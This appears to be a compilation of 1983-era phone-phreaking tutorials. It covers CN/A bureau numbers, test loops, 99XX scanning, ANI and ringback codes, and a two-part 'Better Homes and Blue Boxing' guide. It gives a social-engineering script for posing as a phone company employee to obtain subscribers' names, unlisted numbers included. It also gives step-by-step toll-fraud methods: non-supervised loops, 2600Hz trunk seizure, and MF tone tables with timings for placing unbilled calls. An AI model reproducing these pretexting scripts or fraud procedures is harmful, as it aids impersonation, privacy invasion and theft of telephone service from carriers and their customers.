OF ANY CUSTOMER IN THE BELL SYSTEM. ALL #'S ARE MAINTAINED ON FILE INCLUDING
UNLISTED #'S.HERE'S HOW IT WORKS: 1) YOU HAVE A # AND YOU WANT TO FINDOUT WHO
OWNS IT, E.G. (914) 555-1234. 2) YOU LOOK UP THE CN/A # FOR THAT NPA IN THE
LIST BELOW. IN THE EXAMPLE, THEN NPA IS 914 AND THE CN/A # IS 518-471-8111.
3) YOU THEN CALL UP THE CN/A # (DURING BUSINESS HOURS) AND SAY SOMETHING
LIKE,"HI, THIS IS JOHN JONES FROM THE RESIDENTIAL SERVICE CENTER IN MIAMI.
CAN I HAVE THE CUSTOMER'S NAME AT 914-555-1234. THAT # IS 914-555-1234.
"MAKE UP YOUR OWN REAL SOUNDING NAME,THOUGH. 4) IF YOU SOUND NATURAL & CHEERY,
THE OPERATOR WILL ASK NO QUESTIONS.HERE'S THE LIST:
NPA CN/A # NPA CN/A # --- ------- --- ---------------
201-676-7070 517 313-232-8690202 202-384-9620 518 518-471-8111203
203-789-6800 519 416-487-3641204 ****N/A***** 601 601-961-0877205
205-988-7000 602 303-232-2300206 206-382-8000 603 617-787-2750207
617-787-2750 604 604-432-2996208 303-232-2300 605 402-345-0600209
415-546-1341 606 502-583-2861212 518-471-8111 607 518-471-8111213
213-501-4144 608 414-424-5690214 214-948-5731 609 201-676-7070215
412-633-5600 612 402-345-0600216 614-464-2345 613 416-487-3641217
217-525-7000 614 614-464-2345218 402-345-0600 615 615-373-5791219
317-265-7027 616 313-223-8690301 301-534-1168 617 617-787-2750302
412-633-5600 618 217-525-7000303 303-232-2300 701 402-345-0600304
304-344-8041 702 415-546-1341305 912-784-9111 703 804-747-1411306
****N/A***** 704 912-784-9111307 303-232-2300 705 416-487-3641308
402-345-0600 707 415-546-1341309 217-525-7000 709 ****N/A*****312
312-769-9600 712 402-345-0600313 313-223-8690 713 713-658-1793314
314-436-3321 714 213-995-0221315 518-471-8111 715 414-424-5690316
816-275-2782 716 518-471-8111317 317-265-7027 717 412-633-5600318
318-227-1551 801 303-232-2300319 402-345-0600 802 617-787-2750401
617-787-2750 803 912-784-9111402 402-345-0600 804 804-747-1411403
403-425-2652 805 415-546-1341404 912-784-9111 806 512-828-2502405
405-236-6121 807 416-487-3641406 303-232-2300 808 212-226-5487408
415-546-1341 BERMUDA ONLY412 412-633-5600 809 212-334-4336413
617-787-2750 812 317-265-7027414 414-424-5690 813 813-228-7871415
415-546-1132 814 412-633-5600416 416-487-3641 815 217-525-7000417
314-436-3321 816 816-275-2782418 514-861-6391 817 214-948-5731419
614-464-2345 819 514-861-6391501 405-236-6121 901 615-373-5791502
502-583-2861 902 902-421-4110503 503-241-3440 903 ****N/A*****504
504-245-5330 904 912-784-9111505 303-232-2300 906 313-223-8690506
506-657-3855 907 ****N/A*****507 402-345-0600 912 912-784-9111509
206-382-8000 913 816-275-2782512 512-828-2501 914 518-471-8111513
614-464-2345 915 512-828-2501514 514-861-6391 916 415-546-1341515
402-345-0600 918 405-236-6121516 518-471-8111 919 912-784-9111
BELL USES THESE #'S MAINLY TO FIND OUT WHO OWNS A # THAT A CUSTOMER
CLAIMS HE NEVER CALLED.NOTE: THIS IS THE MOST COMPLETE LIST OF CN/A #'S
IN MY POSSESSION (WITH ONLY 5 #'S NOT AVAILABLE) THIS LIST WAS COPYRIGHTED IN
1982 BY "JUDAS GERARD" AS IT ORIGINALLY APPEARED IN TAP ISSUE #78. (TAP,
ROOM 603, 147 W 42ND ST, NEW YORK, NY 10036-- SUBSCRIPTIONS $10/YR.)AT&T
NEWSLINES:---------------NEWSLINES ARE RECORDINGS THAT BELL EMPLOYEES CALL
UP TO FIND OUT THE LATEST INFO ON STOCK, TECHNOLOGY, ETC.CONCERNING THE BELL
SYSTEM.HERE ARE THE #'S THAT ARE CURRENTLY KNOWN TO PHREAKS (AT LEAST TO ME
ANYWAY):
NJ201-483-3800 NJ 513-421-9060 OH203-771-4920 CT 516-234-9914
NY212-393-2151 NY 518-471-2272 NY213-621-4141 CA 617-955-1111
MA213-829-0111 CA (GTE) 702-789-6711 NV213-449-8830 CA 713-224-6116
TX312-368-8000 IL 714-238-1111 CA313-223-7223 MI 717-255-5555
PA314-247-5511 MO 717-787-1031 PA408-493-5000 CA 802-955-1111
VE412-633-3333 PA 808-533-4426 HI414-678-3511 WI 813-223-5666
FL416-929-4323 ONT. 914-948-8100 NY503-228-6271 OR 916-480-8000
========LOOPS========
FIRST OF ALL, YOU MUST UNDERSTAND THE CONCEPT OF LOOPS. I THINK THAT
THE BEST WAY THAT THIS IS UNDERSTOOD IS THE WAY THAT PHRED PHREEK EXPLAINED
IT..."NO SELF-RESPECTING PHONE PHREAK CAN GO THROUGH LIFE WITHOUT KNOWING
WHAT ALOOP IS, HOW TO USE ONE, AND THE TYPES THAT ARE AVAILABLE. THE LOOP IS
AGREAT ALTERNATIVE COMMUNICATION MEDIUM THAT HAS MANY POTENTIAL USES THAT
HAVENT'T EVEN BEEN TAPPED YET. IN ORDER TO EXPLAIN WHAT A LOOP IS, ITWOULD
BE HELPFUL TO VISUALIZE TWO PHONE NUMBERS (LINES) JUST FLOATING AROUND INTHE
TELCO CENTRAL OFFICE (CO). NOW, IF YOU (AND A FRIEND PERHAPS) WERE TO CALL
THESE TWO NUMBERS AT THE SAME TIME,POOOOPFFF!!!, YOU ARE NOW CONNECTED
TOGETHER. I HEAR WHAT YOU'RE SAYING OUT THERE..., "BIG DEAL" OR "WHY SHOULD
MA BELL COLLECT HERE TWO MSU'S (MESSAGE UNITS) FOR ONE LOUSY PHONE CALL!?"
WELL... THINK AGAIN. HAVEN'T YOU EVER WANTED SOMEONE TO CALL YOU BACK BUT,
WERE RELUCTANT TO GIVE OUT YOUR HOME PHONE NUMBER (LIKE THE LAST TIME YOU
TRIED TO GET YOUR FRIEND'S UNLISTED #FROM THE BUSINESS OFFFICE)? OR HOW
ABOUT A COLLECT CALL TO YOUR FRIEND WAITING ON A LOOP, WHO WILL GLADLY ACCEPT
THE CHARGES? OR BETTER YET,STUMBLING UPON A LOOP THAT YOU DISCOVER THAT HAS
MULTI-USER CAPABILITY (FORTHOSE LATE-NIGHT CONFERENCES). BEST OF ALL IS
FINDING A NON-SUPERVISED LOOP THAT DOESN'T CHARGE ANY MSU'S OR TOLLS TO ONE
OR BOTH PARTIES. EXAMPLE: MANY MOONS AGO, A LOOP AFFECTIONATELY KNOWN AS
'THE 332 LOOP' WAS NON-SUP (IE, NON-SUPERVISED) ON THE TONE SIDE. I HAD MY
FRIEND IN CALIFORNIA DIAL THE FREE(NON-SUP) SIDE, (212) 332-9906 AND I DIALED
THE SIDE THAT CHARGED, 332-9900.AS YOU CAN SEE, I WAS CHARGED ONE MSU,AND MY
FRIEND WAS CHARGED ZILCH, FOR ASLONG AS WE WISHED TO TALK!!!" .AHHH...HAVE I
PERKED YOUR INTEREST YET?IF SO, HERE IS HOW TO FIND A LOOP OFYOU VERY OWN.
FIRST, DO ALL OF YOU LOOP SEARCHING AT NIGHT! THIS IS BECAUSE THE LOOPS SERVE
A GENUINE TEST FUNCTION WHICH TELCO USES DURING THE DAY. (WE DON'T WANT TO
RUN INTO ANI RATE LINEMAN NOW, DO WE?) TO FINDA LOOP, HAVING 2 #'S IS A
DEFINITE PLUS. IF NOT, HAVE A FRIEND TO DIAL#'S AT HIS LOCATION. LAST
RESORT, TRY DIALING FROM TWO ADJACENT PAY PHONES.NOW GET YOUR TRUSTY WHITE
PAGES (*),AND TURN TO THE PAGE WHERE IT LISTS THE # OF MSU'S FROM YOUR
EXCHANGE (OR EXCHANGES IN YOUR PRIMARY CALLING AREA)THE IDEA IS TO FIND A
LOOP THAT I SWITHIN YOUR PRIMARY CALLING AREA OR IS ONLY 1 MSU IN YOUR AREA
(CALL AREA A).THIS IS SO YOU DON'T GO BANKRUPT TRYING TO FIND A LOOP. WRITE
DOWN ALL OF THESE EXCHANGES AND DO A 99XX SCAN OF THOSE EXCHANGES (99XX
SCANNING WILL BE DISCUSSED SHORTLY).BEFORE WE GET UP TO 99XX SCANNING, WE
WILL LOOK AT SOME OTHER LOOP INFO:LOOPS ARE FOUND PAIRS WHICH ARE USUALLY
CLOSE TO EACH OTHER. FOR EXAMPLE, IN NPA 212, WHERE THE INFAMOUS LOOPS ARE
FOUND, THERE IS A STANDARD LOOP FORMAT:MANHATTAN & BRONX-------NNX-9977/9979
BROOKLYN
&QUEENS-------NNX-9900/9906NNX IS THE EXCHANGE TO BE SCANNED. HERE ARE SOME
LOOPS THAT HAVE BEEN FOUND IN NYC. THESE ARE USED MOSTLY BY PHREAKS AND
CALL-IN LINES FOR PIRATE
RADIOSTATIONS:
212-220-9900/9906212-283-9977/9979212-352-9900/9906212-365-9977/
9979212-529-99009906212-562-9977/9979212-982-9977/9979212-986-9977/9979
THE LOWER # IS THE TONE SIDE (SINGING SWITCH). THE HIGHER # IS ALWAYS
SILENT. THE TONE DISAPPEARS ON THE LOWER # WHEN SOMEBODY DIALS IN THE OTHER
SIDE OF THE LOOP. IF YOU ARE ONTHE HIGHER #, YOU'LL HAVE TO LISTEN TO THE
CLICKS TO SEE IF SOMEBODY DIALED-IN. THE NYC 982 & 986 LOOPS ARE DIFFERENT
FROM OTHERS. USUALLY WHEN YOU PARK ON A LOOP, YOU WILL HEAR WHO EVER CALLS IN
ON THE OTHER HALF. WHEN THEY'RE DONE, THE NEXT CALLER (IF ANY) WILL BE
QUEUED IN, ONE AFTER ANOTHER.ON THE NYC 982 & 986, YOU SOMETIME SCAN'T GET
ANY MORE CALLERS IN AFTER THE FIRST. FURTHERMORE, IF YOU PARK ONE OF THESE
LOOPS AND THERE IS NOBODY ON THE OTHER END FOR MORE THAN 4 MINUTES, YOU MAY
BE AUTOMATICALLY DISCONNECTED.THESE LOOPS ARE GOOD FOR BACK-UPPURPOSES WHEN
ALL OTHER LOOPS ARE BUSY. 99XX SCANNING:--------------MOST EVERY EXCHANGE IN
THE BELL SYSTEM HAS A WIDE VARIETY OF TEST #'S AND OTHER "GOODIES," SUCH AS
LOOPS.THESE "GOODIES" ARE USUALLY FOUND BETWEEN 9900 AND 9999 IN YOUR LOCAL
EXCHANGE. IF YOU HAVE THE TIME ANDINITIATIVE, SCAN YOUR EXCHANGE AND YOUMAY
BECOME LUCKY!HERE ARE MY FINDINGS IN THE 914-268:9901 - VERIFICATION
(RECORDING OF A/C AND EXCHANGE)9936 - VOICE # TO THE TELCO CO9937 -
VOICE # TO THE TELCO CO9941 - CARRIER9960 - OSC. TONE (TONE SIDE LOOP)9963 -
TONE (STOPS: MUTED)9966 - CARRIER9968 - TONE THAT DISAPPEARS--RESPONDS
TO CERTAIN TOUCH-TONE KEYSMOST OF THE #'S BETWEEN 9900 & 9999WILL RING, BE
BUSY, GO TO A SPECIAL INTERCEPT OPERATOR ("WHAT #, PLEASE?"), OR WILL GO TO
A "THE # YOU HAVE REACHED..." RECORDING. WHAT YOU FIND DEPENDS UPON THE
SWITCHING EQUIPMENT IN THE EXCHANGE AND THE TELCO OPERATING COMPANY.WHEN
SEARCHING FOR LOOPS, YOU MAY FIND ONE OF THE FOLLOWING POSSIBILITIES WHEN YOU
FIND ONE:1. YOU CAN HEAR THROUGH THE LOOP (NOT MUTED), BUT THERE IS A 1/2
SECOND CLICK EVERY 10 SECONDS THAT INTERRUPTS THE AUDIO.THIS TYPE IS GOOD FOR
BACK-UP USE BUT THE %$#'&" CLICK IS SUPER ANNOYING.2.ONE SIDE OF THE LOOP
IS BUSY; TRY IT AGAIN LATER.3. THE TONE DISAPPEARS, BUT YOU CANNOT HEAR
THROUGH IT (THE LOOP IS MUTED, TRY AGAIN IN A MONTH OR SO)4.YOU GET "THE #
YOU HAVE REACHED RECORDING." NO LOOP THERE! MOST LOOPS ARE MUTED (#3),
BUT THEIR STATUS DOES CHANGES FROM TIME-TO-TIME.IT ALL DEPENDS IF THE TELCO
MAINTENANCE PERSONNEL REMEMBER TO "THROW THE SWITCH", IE, TURN OFF THE LOOP.
SINCE I HAVE DONE THE ABOVE 914-26899XX SCAN, CONGERS (268) HAS INSTALLED
NEW SWITCHING EQUIPMENT (DMS100). SOME OF THE NUMBERS ARE THE SAME, BUT I
HAVE NOTICED THAT ON THE DMS100, THE RECORDINGS ARE ALSO STORED IN THISAREA.
268-9903, 9906, 9909, & 9912 ARE ALL DIFFERENT RECORDINGS. ALSO, THERE ARE
2 FORTRESS FONE RECORDINGS AT 268-9911 (DEPOSIT 5 CENTS OR ELSE) AND 268-9913
(DEPOSIT 10 CENTS). NONE OF THESE RECORDINGS SUPE AND ALOT OF OTHER 99XX#'S
DON'T SUPE EITHER.IN SOME AREAS (LIKE MD), 9906-7 IS RINGBACK. IN WASHINGTON,
THERE IS A SWEEP TONE TEST AT (202) 560-9944. IN NYC (212), YOU'LL FIND THE
INFAMOUS LOOP LINES (AS MENTIONED ABOVE).IT WILL BE EASIER TO SCAN YOUR
EXCHANGE IF YOU MAKE UP A CHART LIKE THE ONE BELOW:
NPA-NNX-99XX SCAN
!--------------------------------------!99X X>:0 :1 :2 :3 :4 :5 :6 :7 :8 :9
!--------------------------------------!990 : : : : : : : : : :
!--------------------------------------!991 : : : : : : : : : :
!--------------------------------------!992 : : : : : : : : : :
!--------------------------------------!993 : : : : : : : : : :
!--------------------------------------!994 : : : : : : : : : :
!--------------------------------------!995 : : : : : : : : : :
!--------------------------------------!996 : : : : : : : : : :
!--------------------------------------!997 : : : : : : : : : :
!--------------------------------------!998 : : : : : : : : : :
!--------------------------------------!999 : : : : : : : : : :
!-------------------------------------------------------------------------
THIS LEAVES YOU WITH 100 BOXES (1 FOREACH # BETWEEN 9900 & 9999).
YOU SHOULD MAKE YOUR BOXES BIG ENOUGH SO YOU CAN WRITE SOME SORT OF SHORT
HAND IN THEM. FOR EXAMPLE:
B - BUSY (TRY AGAIN AT ANOTHER TIME)
R - RINGS (TRY AGAIN AT ANOTHER TIME)
O - INTERCEPT OPERATOR ("WHAT # YOU CALLING?)
R1- RECORDING 1 (MAKE A MARGIN NOTE OF THE TYPES OF RE ORDINGS YOU GET)
T - TONE TONE AT A LOWER # + IGNOREI - IGNORE AT A HIGHER # = LOOPV - VOICE #
TO TELCO CO - THEY USUALLY ANSWER WITH THE CITY NAME OR AREA.
C - CARRIER THERE WILL BE OTHERS AND YOU SHOULD USE OTHER CHARACTERS THAT YOU
CAN UNDERSTAND.NOW, BACK TO LOOPS! AS YOU MAY HAVE NOTICED IN MY
914-268 SCAN, I FOUND AMUTED LOOP AND A TONE SIDE. 914-268 FAILED TO COME
UP WITH THE SILENT SIDE OF A LOOP! THEREFORE, THERE IS NO LOOPIN THAT
EXCHANGE. I THEN SCANNED ANOTHER EXCHANGE IN MY PRIMARY CALLING AREA
(914-634) AND I FOUND A LOOP!!(914) 634-9923/9924SO, IF AT FIRST YOU DON'T
SUCCEED, MOVE ONTO ANOTHER EXCHANGE.IF YOU USE THE BOX METHOD THAT I HAVE
OUTLINED ABOVE, YOU WILL SEE A T & INEXT TO EACH OTHER FOR A LOOP.SOME
EXCHANGES ARE SPECIAL. FOREXAMPLE, 914-623 IS A TESTING BUREAU.IN THIS
EXCHANGE, NOT ONLY DID I FIND ALOOP, BUT I ALSO FOUND SEVERAL INTERESTING
TONES, NOISES, AND OTHERTEST FUNCTIONS. ALSO, THE MORE IMPORTANT THE EXCHANGE
IS, THE MORE YOU WILL FIND. FOR EXAMPLE, IN 914-623, I FOUND WELL OVER 10
VOICE #'S! ALSO, LOOPS ARE USUALLY, BUT NOT EXCLUSIVELY, FOUND IN THE 99XX
SERIES.FOR EXAMPLE:(713) 324-1799/1499IS A LOOP.THE PERFECT LOOP? HERE IS
WHAT I WOULD LOOK FOR: 1.NON-SUP ON ONE OR BOTH SIDES. TO CHECK FOR A
NON-SUP LOOP, GO TO A TONE-FIRST FORTRESS FONE AND DIAL THE #.IF IT ASKS FOR
A DIME, IT IS SUPERVISED. IF THE CALL GOES THROUGH, THEN IT IS NON-SUPED!
2. 800 LOOPS WOULD BE A PLUS. THEY ARE NOT NECESSARILY FOUND BETWEEN 9900 &
9999 THOUGH. I WOULD CHECK THE 1XXX SERIES FIRST. 3. MULTI-USER LOOPS ARE
ALSO A PLUS FOR THOSE LATE NIGHT CONFERENCES.FINALLY, REMEMBER IT IS ONLY A
LOCAL CALL TO FIND OUT WHAT YOU CO HAS IN STORE FOR YOU. IF YOU FIND ANYTHING
INTERESTING, BE SURE TO DROP ME A LINE.NOTE: YOUR LOCAL WHITE PAGES CAN BE A
VALUABLE ASSET. YOU CAN ALSO ORDER OTHER FONE BOOKS FROM YOUR
BUSINESS OFFICE (USUALLY FREE FOR BOOKS WITHIN YOUR OPERATING COMPANY'S
DISTRICT). A LARGE FONE BOOK, SUCH AS MANHATTAN, CONTAINS MUCH MORE INFO IN
THE FIRST FEW PAGES THAN OTHER BOOKS.
======ANI======
AUTOMATIC NUMBER IDENTIFICATION (ANI),IS A NUMBER THAT YOU CALL UP THAT
WILL TELL YOU WHAT # YOU ARE CALLING FROM.THIS HAS A FEW USES. FIRST, WERE
YOU EVER SOMEWHERE AND THE FONE DIDN'T HAVEA # PRINTED ON IT? OR PERHAPS YOU
WERE FOOLING AROUND IN SOME CANS (THOSE LARGE BOXES ON FONE POLES THAT CONTAIN
TERMINALS FOR LINEMAN USE--TO BE DISCUSSES IN A FUTURE CHAPTER.) AND YOU WANT
TO KNOW WHAT WHAT THE LINE # IS.IN NPA 914, THE ANI IS 990. IN NPA'S212 & 516,
ANI IS 958. THIS VARIES FROM AREA TO AREA.HERE ARE SOME OTHER ANI'S THAT I
HAVESEEN:890-751-519120222222221-XXX-1111 (IN SOME 914 AREAS, ESP.
UNDER STEP-BY-STEP SWITCHING EQUIPMENT, YOU HAVE TO DIAL 1-990-1111)TO FIND
ANI FOR OTHER AREAS, CHECK 3 DIGITS #'S FIRST, USUALLY IN THE 9XXSERIES
(EXCLUDING 911). IN AREAS UNDERSTEP-BY-STEP (TO BE DISCUSSED IN THE NEXT PART)
TRY 1-9XX-1111.ANI MAY ALSO BE IN 99XX. LAST RESORT,TRY TO GET FRIENDLY WITH
YOUR NEIGHBOR WHO WORKS FOR THE FONE COMPANY.RINGBACK:---------RINGBACK, AS
ITS NAME IMPLIES, CALLSBACK THE # YOU ARE AT WHEN YOU DIAL THE RINGBACK
#.RINGBACK, IN NPA 914, IS 660. YOU DIAL660+THE LAST 4 DIGITS OF THE FONE.
YOU WILL THEN GET A TONE, HANG-UP QUICKLY AND PICK-UP IN ABOUT 2 SECONDS.
YOU WILL THEN GET A SECOND TONE, HANG-UP AGAIN AND THE FONE WILL RING.IN NYC,
IT IS ALSO 660, BUT YOU MAY HAVE TO PRESS 6 OR 7 BEFORE YOU HANG UPFOR THE
FIRST TIME (IE, AT THE FIRST TONE).OTHER RINGBACK #'S THAT I HAVE SEEN
ARE:26011 - THIS 5 DIGIT FORMAT IS USED PRIMARILY ON STEP-BY-STEP. THE LAST 2
DIGITS (11) ARE DUMMY DIGITS.890-897-XXXX - XXXX ARE THE LAST 4 DIGITS OF THE
FONE #.119911/11911/1199911 - GTENNX-9906/9907 - NPA 301, NNX IS THE
EXCHANGE THE REASON YOU GET THE TONE WHEN YOU PICK-UP AFTER IT RINGS IS
BECAUSE IN SOME AREAS, PEOPLE WERE USING RINGBACKAS AN IN-HOUSE INTERCOM.
THEY WOULD DIAL RINGBACK, AND WHEN IT STOPPED RINGING, THEY WOULD PICK-UP &
TALK WITHTHE PERSON WHO PICKED UP THE OTHER EXTENSION. BELL DIDN'T LIKE THIS
SINCE THERE IS USUALLY ONLY 1 PIECE OF EQUIPMENT IN EACH EXCHANGE THAT DOES
THE RINGBACK. WHEN PEOPLE USED THIS ASAN INTERCOM, LINEMEN & REPAIRMEN
COULDN'T GET THROUGH! IN SOME AREAS,ESPECIALLY THOSE UNDER STEP-BY-STEP,
RINGBACK CAN STILL BE USED AS AN INTERCOM. ALSO, UNDER STEP-BY-STEP,THE
RINGBACK PROCEDURE IT USUALLY SIMPLE. FOR EXAMPLE, IN ONE AREA YOU WOULD
DIAL 26011 AND HANG-UP; IT WOULD THEN RINGBACK.TOUCH-TONE TEST:----------------
IN AREAS THAT HAVE A TOUCH-TONE TEST,YOU DIAL THE RINGBACK #. AT THE FIRST
TONE, YOU TOUCH-TONE DIGITS 1-0. IF THEY ARE CORRECT IT WILL BEEP TWICE.I
HAVE ALSO SEEN A TT TEST IN SOMEAREAS AT: 890-751-5191COMING SOON:------------
IN THE NEXT PART, WE WILL LOOK ATVARIOUS SWITCHING EQUIPMENT AND THE NETWORK.
BREAK UP OF BELL:-----------------THE OPERATING COMPANIES ARE NOT GOING TO
CHANGE ALL THE SWITCHING EQUIPMENT AROUND. WHILE THERE WILL BE SOME CHANGES,
MOST OF THE INFORMATION PROVIDED HERE WILL REMAIN PERTINENT AFTER JANUARY 1,
1984. JUST SUBSTITUTE THE WORD "FONE NETWORK" FOR BELL SYSTEM.AU REVOIR,
*****BIOC*=$=*AGENT*****
DECEMBER 8, 1983
ACKNOWLEDGEMENTS: TAP, PHRED PHREEK,JUDAS GERARD, THE MAGICIAN, DARKPRIEST, &
MYSELF. I WOULD ALSO LIKE TO THANK THE MULCHER FOR HIS
ASSISTANCE IN DISTRIBUTING THIS TUTORIAL.
The Next text file was one of my favorite in my B-Boxing days. As I
know of, the information in this text is still very good information, because
AT&T still has not switch out all of there older equipment. It is still even
possible to box off of 1-800 wats lines! Even though, I myself wouldn't. Read
and learn why. I have found that some 305 area codes still work well
though.......
V
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Better Homes and Blue Boxing
Part I
Theory of Operation
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
To quote Karl Marx, blue boxing has always been the most noble form of
phreaking. As opposed to such things as using an MCI code to make a free fone
call, which is merely mindless pseudo-phreaking, blue boxing is actual
interaction with the Bell System toll network. It is likewise advisable to be
more cautious when blue boxing, but the careful phreak will not be caught,
regardless of what type of switching system he is under.
In this part, I will explain how and why blue boxing works, as well as where.
In later parts, I will give more practical information for blue boxing and
routing information.
To begin with, blue boxing is simply communicating with trunks. Trunks must
not be confused with subscriber lines (or "customer loops") which are standard
telefone lines. Trunks are those lines that connect central offices. Now, when
trunks are not in use (i.e., idle or "on-hook" state) they have 2600Hz applied
to them. If they are two-way trunks, there is 2600Hz in both directions. When a
trunk IS in use (busy or "off-hook" state"), the 2600Hz is removed from the side
that is off-hook. The 2600Hz is therefore known as a supervisory signal, because
it indicates the status of a trunk; on hook (tone) or off-hook (no tone). Note
also that 2600Hz denoted SF (single frequency) signalling and is "in-band." This
is very important. "In-band" means that is is within the band of frequencies
that may be transmitted over normal telefone lines. Other SF signals, such as
3700Hz are used also. However, they cannot be carried over the telefone network
normally (they are "out-of- band") and are therefore not able to be taken
advantage of as 2600Hz is.
Back to trunks. Let's take a hypothetical phone call. You pick up your fone
and dial 1+806-258-1234 (your good friend in Armarillo, Texas). For ease, we'll
assume that you are on #5 Crossbar switching and not in the 806 area. Your
central office (CO) would recognize that 806 is a foreign NPA, so it would route
the call to the toll centre that serves you. [For the sake of accuracy here, and
for the more experienced readers, note that the CO in question is a class 5 with
LAMA that uses out-of-band SF supervisory signalling]. Depending on where you
are in the country, the call would leave your toll centre (on more trunks) to
another toll centre, or office of higher "rank". Then it would be routed to
central office 806-258 eventually and the call would be completed. Illustration:
A---CO1-------TC1------TC2----CO2----B
A=you CO1=your central office
TC1=your toll office.
TC2=toll office in Amarillo.
CO2=806-258 central office.
B=your friend (806-258-1234)
In this situation it would be realistic to say that CO2 uses SF in-band
(2600Hz) signalling, while all the others use out-of-band signalling (3700Hz).
If you don't understand this, don't worry too much. I am pointing this out
merely for the sake of accuracy. The point is that while you are connected to
806-258- 1234, all those trunks from YOUR central office (CO1) to the 806-258
central office (CO2) do *NOT* have 2600Hz on them, indicating to the Bell
equipment that a call is in progress and the trunks are in use.
Now let's say you're tired of talking to your friend in Amarillo
(806-258-1234) so you send a 2600Hz down the line. This tone travels down the
line to your friend's central office (CO2) where it is detected. However, that
CO thinks that the 2600Hz is originating from Bell equipment, indicating to it
that you've hung up, and thus the trunks are once again idle (with 2600Hz
present on them). But actually, you have not hung up, you have fooled the
equipment at your friend's CO into thinking you have. Thus,it disconnects hi
and resets the equipment to prepare for the next call. All this happens very
quickly (300-800ms for step-by-step equipment and 150-400ms for other
equipment).
When you stop sending 2600Hz (after about a second), the equipment thinks that
another call is coming towards it (e.g. it thinks the far end has come
"off-hook" since the tone has stopped. It could be thought of as a toggle
switch: tone --> on hook, no tone -->off hook. Now that you've stopped sending
2600Hz, several things happen: 1) A trunk is seized.
2) A "wink" is sent to the CALLING end from the CALLED end indicating that the
CALLED end (trunk) is not ready to receive digits yet.
3) A register is found and attached to the CALLED end of the trunk within about
two seconds (max).
4) A start-dial signal is sent to the CALLING end from the CALLED end indicating
that the CALLED end is ready to receive digits.
Now, all of this is pretty much transparent to the blue boxer. All he really
hears when these four things happen is a <beep><kerchunk>. So, seizure of a
trunk would go something like this:
1> Send a 2600Hz
2> Terminate 2600Hz after 1-2 secs.
3> [beep][kerchunk]
Once this happens, you are connected to a tandem that is ready to obey your
every command. The next step is to send signalling information in order to place
your call. For this you must simulate the signalling used by operators and
automatic toll-dialing equipment for use on trunks. There are mainly two
systems, DP and MF. However, DP went out with the dinosaur , so I'll only
discuss MF signalling. MF (multi-frequency) signalling is the signalling used by
the majority of the inter- and intra-lata network. It is also used in
international dialing known as the CCITT no.5 system.
MF signalling consists of 7 frequencies, beginning with 700Hz and separated
by 200Hz. A different set of two of the 7 frequencies represent the digits 0
thru 9, plus an additional 5 special keys. The frequencies and uses are as
follows:
Frequencies (Hz) Do
stic Int'l
--------------------------------------
700+900 1 1
700+1100 2 2
900+1100 3 3
700+1300 4 4
900+1300 5 5
1100+1300 6 6
700+1500 7 7
900+1500 8 8
1100+1500 9 9
1300+1500 0 0
700+1700 ST3p Code 11
900+1700 STp Code 12
1100+1700 KP KP1
1300+1700 ST2p KP2
1500+1700 ST ST
The timing of all the MF signals is a nominal 60ms, except for KP, which
should have a duration of 100ms. There should also be a 60ms silent period
between digits. This is very flexible, however, and most Bell equipment will
accept outrageous timings.
In addition to the standard uses listed above, MF pulsing also has expanded
usages known as "expanded inband signalling" that include such things as coin
collect, coin return, ringback, operator attached, and operator released. KP2,
code 11, and code 12 and the STops (STart "primes") all have special uses which
will be mentioned only briefly here.
To complete a call using a blue box, once seizure of a trunk has been
accomplished by sending 2600Hz and pausing for the <beep><kerchunk>, one must
first send a KP. This readies the register for the digits that follow. For a
standard domestic call, the KP would be followed by either 7 digits (if the call
were in the same NPA as the seized trunk) or 10 digits (if the call were not in
the same NPA as the seized trunk). [Exactly like dialing a normal fone call].
Following either the KP and 7 or 10 digits, a STart is sent to signify that no
more digits follow. Example of a complete call:
1> Dial 1-806-258-1234
2> wait for a call-progress indication (such as ring, busy, recording, etc.)
3> Send 2600Hz for about 1 second.
4> Wait for about 2 seconds while a trunk is seized.
5) Send KP+305+994+9966+ST
The call will then connect if everything was done properly. Note that if a
call to an 806 number were being placed in the same situation, the area code
would be omitted and only KP+ seven digits+ST would be sent.
Code 11 and code 12 are used in international calling to request certain types
of operators. KP2 is used in international calling to route a call other than by
way of the normal route, whether for economic or equipment reasons.
STp, ST2p, and ST3p (prime, two prime, and three prime) are used in TSPS
signalling to indicate calling type of call (such as coin-direct dialed).
This has been Part I of Better Homes and Blue Boxing. I hope you enjoyed and
learned from it. If you have any questions, comments, threats or insults, please
fell free to drop me a line. If you have noticed any errors in this text (yes,
it does happen), please let me know and perhaps a correction will be in order.
Part II will deal mainly with more advanced principles of blue boxing, as well
as routings and operators.
Note 1: other highly trunkable areas include: 816,305,813,609,205. I
personally have excellent luck boxing off of 609-953-0000. Try that if you have
any trouble.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Better Homes and Blue Boxing
Part II
Practical Applications
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The essential purpose of blue boxing in the beginning was merely to receive
toll services free of charge. Though this can still be done, blue boxing has
essentially outlived its usefulness in this area. Modern day "extenders" and
long distance services provide a safer and easier way to make free fone calls.
However, you can do things with a blue box that just can't be done with any-
thing else. For ordinary toll-fraud, a blue box is impractical for the following
reasons:
1. Clumsy equipment required (blue box or equivalent)
2. Most boxed calls must be made through an extender. Not for safety reasons,
but for reasons I'll explain later.
3. Connections are often sacrificed because considerable distances
must be dialed to cross a seizable trunk, in addition to awkward routing.
As stated in reason #2, boxed calls are usually made through an extender. This
is for billing reasons. If you recall from Part i, 2600Hz is used as a
"supervisory" signal. That is, it signals the status of a trunk-- "on-hook" or
"off-hook." When you seize a trunk (by briefly sending 2600Hz), your end (the
CALLING end) goes on hook for the duration of the 2600Hz and then goes off-hook
once again when the 2600Hz is terminated. The CALLED end recognizes that a call
is on the way and attaches a register, which inerprets the digits which are to
be sent. Now, understand that even though your end has come off-hook (no 2600Hz
present), the other end is still on-hook. You may wonder then, why, if the other
end (the CALLED end) is still on-hook, there is no 2600Hz coming the other way
on the trunk, when there should be. This is correct. 2600Hz *IS* present on the
trunk when you seize it and afterwards, but you cannot hear it because of a Band
Elimination Filter (BEF) at your central office.
Back to the problem. Remember that when you seize a trunk, 2600Hz is indeed
coming the other way on the trunk because the CALLED end is still on-hook, but
you don't actually hear it because of a filter. However, the Bell equipment
knows it's there (they can "hear" it). The presence of the 2600Hz is telling the
billing equip- ment that your call has not yet been completed (i.e., the CALLED
end is still on-hook). When finally you do connect with your boxed call, the
2600Hz from the called end terminates. This tells the billing equipment that
